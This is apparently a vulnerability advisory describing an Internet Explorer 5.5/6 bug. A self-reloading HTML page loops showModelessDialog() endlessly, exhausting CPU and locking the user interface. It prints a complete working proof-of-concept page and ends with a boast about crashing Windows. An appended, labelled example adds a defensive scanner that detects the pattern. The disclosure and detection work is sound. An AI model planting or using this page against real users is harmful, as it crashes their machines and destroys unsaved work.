Description:
There is a bug in Internet Explorer 6 (and probably in
lower versions down to 5.0 as well) that allows a script
to open an unlimited number of modeless dialogs, each
containing the page it was opened from, creating an
endless loop that renders Internet Explorer useless.
The dialogs also managed to stay open after the iexplore
process was killed and continued to loop until CPU usage
was maxed at 100%. Due to the nature of the
showModelessDialog() function, the dialog fails to give
up focus, and the machine may even become unable to
function, requiring a reboot to regain control of the
user interface.
Risk:
Moderate?
Systems Affected:
Internet Explorer 6.0
Internet Explorer 5.5
Possibly 5.0 if the function is supported in that
version. No box with 5.0 was available to test.
Vendor Status:
Sending a copy of this message to them as I type.
Example:
Place this code into an HTML file called exploit.html:
<html>
<head>
<script type="text/javascript">
// Each dialog loads exploit.html again, so every dialog runs this loop too.
function exploit() {
  while (1) {
    showModelessDialog("exploit.html");
  }
}
</script>
</head>
<body onLoad="exploit()">
</body>
</html>
Workaround:
Disable JavaScript
/* took 20 min and a JavaScript book, that's all it
takes to kill a Windows box */
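
As an added example (not part of the original advisory), the script below is a heuristic static check that a content filter could run over HTML to flag the pattern described above: a showModelessDialog() call inside a while or for loop, and whether it reopens the page itself. The names findDialogLoops, loopBodies and skipBalanced and both sample pages are constructed for illustration.

```javascript
// Added example: flags showModelessDialog() calls inside while/for loops. Names are hypothetical.
const DIALOG_CALL = /\bshowModelessDialog\s*\(\s*(?:(["'])(.*?)\1)?/g;

// Index just past the bracket that closes the one opened at `open`.
function skipBalanced(src, open, l, r) {
  let depth = 0;
  for (let i = open; i < src.length; i++) {
    if (src[i] === l) depth++;
    else if (src[i] === r && --depth === 0) return i + 1;
  }
  return src.length; // unterminated: treat the rest of the script as the body
}

// Bodies of every while/for loop in a script (braced block or single statement).
function loopBodies(script) {
  const bodies = [];
  for (const m of script.matchAll(/\b(?:while|for)\s*\(/g)) {
    let start = skipBalanced(script, m.index + m[0].length - 1, "(", ")");
    while (/\s/.test(script[start] || "")) start++;
    const braced = script[start] === "{";
    const end = braced ? skipBalanced(script, start, "{", "}")
                       : (script.indexOf(";", start) + 1 || script.length);
    bodies.push(script.slice(start, end));
  }
  return bodies;
}

// Report each looped dialog call and whether it reopens the page itself.
function findDialogLoops(html, pageName) {
  const findings = [];
  for (const s of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi)) {
    for (const body of loopBodies(s[1])) {
      for (const call of body.matchAll(DIALOG_CALL)) {
        const url = call[2] === undefined ? null : call[2]; // null: URL is not a literal
        findings.push({ url, selfReference: url === pageName });
      }
    }
  }
  return findings;
}

// Constructed sample pages (not captured traffic).
const looping = `<html><head><script type="text/javascript">
function f() { while (1) { showModelessDialog("exploit.html"); } }
</script></head><body onload="f()"></body></html>`;
const benign = `<html><body><script>
for (var i = 0; i < 3; i++) { total += i; }
showModelessDialog("help.html");
</script></body></html>`;
console.log(findDialogLoops(looping, "exploit.html"), findDialogLoops(benign, "index.html"));
```

Braces inside string literals or comments of the scanned script can skew the loop boundaries, and a call inside nested loops is reported once per enclosing loop.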